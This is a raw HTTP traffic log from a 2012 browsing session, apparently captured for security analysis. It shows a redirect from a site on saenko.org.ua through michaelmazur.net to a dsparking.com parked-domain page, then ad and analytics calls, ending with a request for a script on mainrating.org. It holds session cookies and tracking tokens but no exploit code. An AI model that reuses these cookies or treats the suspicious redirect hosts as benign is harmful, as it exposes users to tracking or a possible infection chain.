GET /apps/domainpark/domainpark.cgi?callback=_google_json_callback&output=js&client=ca-dp-oversee_ncd&domain_name=michaelmazur.net&st=create&s=michaelmazur.net&dt=1352241446337&u_tz=60&u_his=1&u_h=885&u_w=1176&frm=2&ref=http%3A%2F%2F11d.saenko.org.ua%2Findex.php%3Foption%3Dcom_registration HTTP/1.1 Host: googleads.g.doubleclick.net GET /apps/domainpark/domainpark.cgi?callback=_google_json_callback&output=js&client=ca-dp-oversee_ncd&domain_name=michaelmazur.net&st=create&s=michaelmazur.net&dt=1352241446337&u_tz=60&u_his=1&u_h=885&u_w=1176&frm=2&ref=http%3A%2F%2F11d.saenko.org.ua%2Findex.php%3Foption%3Dcom_registration HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://michaelmazur.net/xml.php Cookie: id=223ae1776901005b\|\|t=1350343758\|et=730\|cs=002213fd480aa30e9cef2f5d42	HTTP/1.1 200 OK Content-Type: application/javascript; charset=UTF-8 Content-Disposition: inline P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" X-Content-Type-Options: nosniff Content-Encoding: gzip Date: Tue, 06 Nov 2012 22:37:26 GMT Server: domainserver Cache-Control: private Content-Length: 65 X-XSS-Protection: 1; mode=block
GET /css/11662/landing/en.css HTTP/1.1 Host: cdn.dsultra.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/css,/;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://dsparking.com/?domainname=michaelmazur.net&a_id=48873&session_token=undefined	HTTP/1.1 200 OK Content-Type: text/css Server: Apache/2.0.52 (CentOS) Etag: "ab6fe-1ffa-4c7b6e43cae80" Accept-Ranges: bytes Vary: Accept-Encoding,User-Agent Content-Encoding: gzip Cache-Control: max-age=300 nnCoection: close Age: 252 Date: Tue, 06 Nov 2012 22:37:27 GMT Last-Modified: Mon, 20 Aug 2012 18:43:54 GMT Expires: Tue, 06 Nov 2012 22:38:15 GMT Content-Length: 1920 Connection: keep-alive
GET /css/headers/custom.css HTTP/1.1 Host: cdn.dsultra.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/css,/;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://dsparking.com/?domainname=michaelmazur.net&a_id=48873&session_token=undefined	HTTP/1.1 200 OK Content-Type: text/css Server: Apache/2.0.52 (CentOS) Etag: "a37fc-2123-4cdc4adeb3680" Accept-Ranges: bytes Vary: Accept-Encoding,User-Agent Content-Encoding: gzip Cache-Control: max-age=300 nnCoection: close Age: 171 Date: Tue, 06 Nov 2012 22:37:27 GMT Last-Modified: Mon, 05 Nov 2012 19:42:02 GMT Expires: Tue, 06 Nov 2012 22:39:36 GMT Content-Length: 1283 Connection: keep-alive
GET /images/11662/sprite.gif HTTP/1.1 Host: cdn.dsultra.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://cdn.dsultra.com/css/11662/landing/en.css	HTTP/1.1 200 OK Content-Type: image/gif Server: Apache/2.0.52 (CentOS) Etag: "ab854-ae1-4ca1667e51400" Accept-Ranges: bytes Vary: Accept-Encoding,User-Agent Content-Encoding: gzip Cache-Control: max-age=86400 Cneonction: close Age: 14946 Date: Tue, 06 Nov 2012 22:37:27 GMT Last-Modified: Wed, 19 Sep 2012 23:31:28 GMT Expires: Wed, 07 Nov 2012 18:28:21 GMT Content-Length: 2716 Connection: keep-alive
GET /images/11662/bg_main.jpg HTTP/1.1 Host: cdn.dsultra.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://cdn.dsultra.com/css/11662/landing/en.css	HTTP/1.1 200 OK Content-Type: image/jpeg Server: Apache/2.0.52 (CentOS) Etag: "ab7f3-4f54-4ca1667e51400" Accept-Ranges: bytes Vary: Accept-Encoding,User-Agent Content-Encoding: gzip Cache-Control: max-age=300 Cneonction: close Age: 62 Date: Tue, 06 Nov 2012 22:37:27 GMT Last-Modified: Wed, 19 Sep 2012 23:31:28 GMT Expires: Tue, 06 Nov 2012 22:41:25 GMT Content-Length: 18016 Connection: keep-alive
GET /error_header.html?domainname=michaelmazur.net HTTP/1.1 Host: dmo.ecommerce.netdna-cdn.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://dsparking.com/?domainname=michaelmazur.net&a_id=48873&session_token=undefined	HTTP/1.1 200 OK Content-Type: text/html Date: Tue, 06 Nov 2012 22:37:28 GMT Transfer-Encoding: chunked Connection: keep-alive Last-Modified: Mon, 28 Nov 2011 20:27:32 GMT Etag: "31a-4b2d155121500" Server: NetDNA-cache/2.2 X-Cache: HIT Content-Encoding: gzip
GET /ga.js HTTP/1.1 Host: www.google-analytics.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://dsparking.com/?domainname=michaelmazur.net&a_id=48873&session_token=undefined If-Modified-Since: Wed, 19 Sep 2012 11:51:40 GMT	HTTP/1.1 200 OK Content-Type: text/javascript Content-Length: 14888 Content-Encoding: gzip Last-Modified: Mon, 22 Oct 2012 15:51:19 GMT X-Content-Type-Options: nosniff, nosniff Date: Tue, 06 Nov 2012 13:21:27 GMT Expires: Wed, 07 Nov 2012 01:21:27 GMT Vary: Accept-Encoding Age: 33361 Cache-Control: max-age=43200, public Server: GFE/2.0
GET /?domainname=michaelmazur.net&a_id=48873&session_token=undefined HTTP/1.1 Host: dsparking.com GET /?domainname=michaelmazur.net&a_id=48873&session_token=undefined HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://michaelmazur.net/xml.php	HTTP/1.0 200 (OK) Content-Type: text/html Cache-Control: private, no-cache, must-revalidate Connection: Keep-Alive Pragma: no-cache Server: Oversee Turing v1.0.0 Content-Encoding: gzip Content-Length: 22463 Expires: Mon, 26 Jul 1997 05:00:00 GMT Keep-Alive: timeout=3, max=99 P3P: policyref="http://www.dsparking.com/w3c/p3p.xml", CP="NOI DSP COR ADMa OUR NOR STA" Set-Cookie: ident=search%3A0%7Cexitpop%3A0%7Clload%3A0%7Clvisit%3A1352241446%7Cclick%3A0%7Cblocked%3A0%7Ctoken%3Awrzwtwprtpwswpxy; path=/; expires=Wed, 07-Nov-2012 22:37:27 GMT michaelmazur.net=search%3A0%7Cexitpop%3A0%7Clload%3A0%7Clvisit%3A1352241446%7Cclick%3A0%7Cblocked%3A0; path=/; expires=Wed, 07-Nov-2012 22:37:27 GMT Spusr=490015ac445d50999126e1bf; path=/; expires=Thu, 06-Nov-2014 22:37:27 GMT
GET /__utm.gif?utmwv=5.3.7&utms=1&utmn=1264384645&utmhn=dsparking.com&utmcs=UTF-8&utmsr=1176x885&utmvp=283x133&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmdt=michaelmazur.net&utmhid=216615277&utmr=http%3A%2F%2Fmichaelmazur.net%2Fxml.php&utmp=%2F%3Fdomainname%3Dmichaelmazur.net%26a_id%3D48873%26session_token%3Dundefined&utmac=UA-33908493-1&utmcc=__utma%3D1.968568071.1352241448.1352241448.1352241448.1%3B%2B__utmz%3D1.1352241448.1.1.utmcsr%3Dmichaelmazur.net%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2Fxml.php%3B&utmu=qh~ HTTP/1.1 Host: www.google-analytics.com GET /__utm.gif?utmwv=5.3.7&utms=1&utmn=1264384645&utmhn=dsparking.com&utmcs=UTF-8&utmsr=1176x885&utmvp=283x133&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmdt=michaelmazur.net&utmhid=216615277&utmr=http%3A%2F%2Fmichaelmazur.net%2Fxml.php&utmp=%2F%3Fdomainname%3Dmichaelmazur.net%26a_id%3D48873%26session_token%3Dundefined&utmac=UA-33908493-1&utmcc=__utma%3D1.968568071.1352241448.1352241448.1352241448.1%3B%2B__utmz%3D1.1352241448.1.1.utmcsr%3Dmichaelmazur.net%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2Fxml.php%3B&utmu=qh~ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://dsparking.com/?domainname=michaelmazur.net&a_id=48873&session_token=undefined	HTTP/1.1 200 OK Content-Type: image/gif Date: Thu, 01 Nov 2012 01:18:23 GMT Content-Length: 35 X-Content-Type-Options: nosniff Pragma: no-cache Expires: Wed, 19 Apr 2000 11:43:00 GMT Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate Age: 508745 Server: GFE/2.0
GET /apps/domainpark/domainpark.cgi?callback=_google_json_callback&output=js&client=ca-dp-oversee-rs_js&domain_name=michaelmazur.net&hl=en&channel=004258&adtest=off&st=undefined&s=michaelmazur.net&kw=michael%2520kors&kw_type=broad&num_ads=0&num_radlinks=18&dt=1352241448216&u_tz=60&u_his=1&u_h=885&u_w=1176&frm=2&ref=http%3A%2F%2Fmichaelmazur.net%2Fxml.php HTTP/1.1 Host: googleads.g.doubleclick.net GET /apps/domainpark/domainpark.cgi?callback=_google_json_callback&output=js&client=ca-dp-oversee-rs_js&domain_name=michaelmazur.net&hl=en&channel=004258&adtest=off&st=undefined&s=michaelmazur.net&kw=michael%2520kors&kw_type=broad&num_ads=0&num_radlinks=18&dt=1352241448216&u_tz=60&u_his=1&u_h=885&u_w=1176&frm=2&ref=http%3A%2F%2Fmichaelmazur.net%2Fxml.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://dsparking.com/?domainname=michaelmazur.net&a_id=48873&session_token=undefined Cookie: id=223ae1776901005b\|\|t=1350343758\|et=730\|cs=002213fd480aa30e9cef2f5d42	HTTP/1.1 200 OK Content-Type: application/javascript; charset=UTF-8 Content-Disposition: inline P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" X-Content-Type-Options: nosniff Content-Encoding: gzip Date: Tue, 06 Nov 2012 22:37:28 GMT Server: domainserver Cache-Control: private Content-Length: 65 X-XSS-Protection: 1; mode=block
GET /?epl=mzzGeC1PRoes9bbFBGZFnJhGPZGGhMIpkrvYo6aEpMo45MZy6K9VnovBNu29CS1iq1RhlZxy_0hCzTaqYsq7KjEibAJvEPkAFyS7aGMi5NR78NqFkfQoy3qrZRsfXngoysEJEQIGcwHWSFB7YgrXu5-HFQYyrkFlDOBzNUtP36JBpHG6cPIZKoPjRU5SVDYxTbaBmcVtF6hWuIcfLWP1xQl6yRmslZB-U8Id2FdCMhWTIEV7DUThqdY5aA5i7ut5EqEtvMMbMUq_OjFLzGe4LK6cD_c7EZuBEGWVQdpQohgJAZ2uXNkFBcjFi0WVaDOt0kdPo6iKokySwcJs5_KWZ3hujwjkFv-KFbrApdxr-eJx1MTFy0eYXpEFrHkONAup-3PFkKGmAQ1TRvmpNDSZSgDIQKMRPQ0KmkzT1ACoBzJNRm2KfpoyeSqGGlirTQEw8P_vvwAA8P8FQABAgFscAADTqCfSWVMmWUExNmhaQukBAADw HTTP/1.1 Host: dsparking.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://dsparking.com/?domainname=michaelmazur.net&a_id=48873&session_token=undefined Cookie: ident=search%3A0%7Cexitpop%3A0%7Clload%3A0%7Clvisit%3A1352241446%7Cclick%3A0%7Cblocked%3A0%7Ctoken%3Awrzwtwprtpwswpxy; michaelmazur.net=search%3A0%7Cexitpop%3A0%7Clload%3A0%7Clvisit%3A1352241446%7Cclick%3A0%7Cblocked%3A0; Spusr=490015ac445d50999126e1bf; __utma=1.968568071.1352241448.1352241448.1352241448.1; __utmb=1.1.10.1352241448; __utmc=1; __utmz=1.1352241448.1.1.utmcsr=michaelmazur.net\|utmccn=(referral)\|utmcmd=referral\|utmcct=/xml.php	HTTP/1.0 200 (OK) Content-Type: text/javascript Cache-Control: private, no-cache, must-revalidate Connection: Keep-Alive Pragma: no-cache Server: Oversee Turing v1.0.0 Content-Encoding: gzip Content-Length: 5270 Expires: Mon, 26 Jul 1997 05:00:00 GMT Keep-Alive: timeout=3, max=96 P3P: policyref="http://www.dsparking.com/w3c/p3p.xml", CP="NOI DSP COR ADMa OUR NOR STA"
GET /js/main.js HTTP/1.1 Host: cdn.dsultra.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://dsparking.com/?domainname=michaelmazur.net&a_id=48873&session_token=undefined	HTTP/1.1 200 OK Content-Type: application/x-javascript Server: Apache/2.0.52 (CentOS) Etag: "a75da-5f06-4ca16686e6840" Accept-Ranges: bytes Vary: Accept-Encoding,User-Agent Content-Encoding: gzip Cache-Control: max-age=300 nnCoection: close Age: 294 Date: Tue, 06 Nov 2012 22:37:29 GMT Last-Modified: Wed, 19 Sep 2012 23:31:37 GMT Expires: Tue, 06 Nov 2012 22:37:35 GMT Content-Length: 7433 Connection: keep-alive
GET /images/11782/sprite.gif HTTP/1.1 Host: cdn.dsultra.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://cdn.dsultra.com/css/11662/landing/en.css	HTTP/1.1 200 OK Content-Type: image/gif Server: Apache/2.0.52 (CentOS) Etag: "ab7f9-ae1-4ca1668315f40" Accept-Ranges: bytes Vary: Accept-Encoding,User-Agent Content-Encoding: gzip Cache-Control: max-age=86400 Cneonction: close Age: 14947 Date: Tue, 06 Nov 2012 22:37:29 GMT Last-Modified: Wed, 19 Sep 2012 23:31:33 GMT Expires: Wed, 07 Nov 2012 18:28:22 GMT Content-Length: 2716 Connection: keep-alive
GET /?epl=KAwln_J6d6-9GuUR_M1pDPK4OFWQUDhFchd_aL2Ei26GTQx_JRwu8C2r7iwj9mBIbrJEUm64GoMyG1LEkhQ-HK0eNhWiAszotdSMq47cUgln7ptv49UWf_XGnccYAYcf0RKBFAoEvqB6lEzsGhNrPm0SCK0SRjyPiHBDXywQNbxPvq7EWVBMOZKUnEAMgtQwlopmUyZMVZPLLTKuGyHNhAdKy_HZBvdPViPWOjYQM4lRSBciJkoPsTSRe2QvlHykYU8aPdpKHKTt2JG8Pj4_-qXXwO-W2QrSwklReceoJEE8eU6W2HKOyGOJFamKZAU2lrVD6CCKasSqIUyY11BomYbnukKCHmurg5cZCly3a4jPFBra-9FxGBzYDtIAsyE1TgE0MpqGmmlqmiaQqQQaGgCaMKQJTdNMlUCjZtBokEzTpA3JtKmG2qxNATDw3--_AADw_wUAAECAWxsAAPK4OFVZUyZZQTE2aFpC5QEAAPA HTTP/1.1 Host: dsparking.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://dsparking.com/?domainname=michaelmazur.net&a_id=48873&session_token=undefined Cookie: ident=search%3A0%7Cexitpop%3A0%7Clload%3A0%7Clvisit%3A1352241446%7Cclick%3A0%7Cblocked%3A0%7Ctoken%3Awrzwtwprtpwswpxy; michaelmazur.net=search%3A0%7Cexitpop%3A0%7Clload%3A0%7Clvisit%3A1352241446%7Cclick%3A0%7Cblocked%3A0; Spusr=490015ac445d50999126e1bf; __utma=1.968568071.1352241448.1352241448.1352241448.1; __utmb=1.1.10.1352241448; __utmc=1; __utmz=1.1352241448.1.1.utmcsr=michaelmazur.net\|utmccn=(referral)\|utmcmd=referral\|utmcct=/xml.php	HTTP/1.0 200 (OK) Content-Type: image/jpeg Cache-Control: private, no-cache, must-revalidate Connection: Keep-Alive Pragma: no-cache Server: Oversee Turing v1.0.0 Content-Length: 0 Expires: Mon, 26 Jul 1997 05:00:00 GMT Keep-Alive: timeout=3, max=99 P3P: policyref="http://www.dsparking.com/w3c/p3p.xml", CP="NOI DSP COR ADMa OUR NOR STA" Set-Cookie: michaelmazur.net=search%3A0%7Cexitpop%3A0%7Clload%3A1352241449%7Clvisit%3A1352241446%7Cclick%3A0%7Cblocked%3A0; path=/; expires=Wed, 07-Nov-2012 22:37:29 GMT ident=search%3A0%7Cexitpop%3A0%7Clload%3A1352241449%7Clvisit%3A1352241446%7Cclick%3A0%7Cblocked%3A0%7Ctoken%3Aqqztqwvywusutprq; path=/; expires=Wed, 07-Nov-2012 22:37:29 GMT Spusr=490015ac445d50999126e1bf; path=/; expires=Thu, 06-Nov-2014 22:37:29 GMT
GET /favicon.ico HTTP/1.1 Host: 11d.saenko.org.ua User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: 3c150ba574030fb78759fe85189b3f7b=-
GET /mainrating.js HTTP/1.1 Host: mainrating.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://11d.saenko.org.ua/index.php?option=com_registration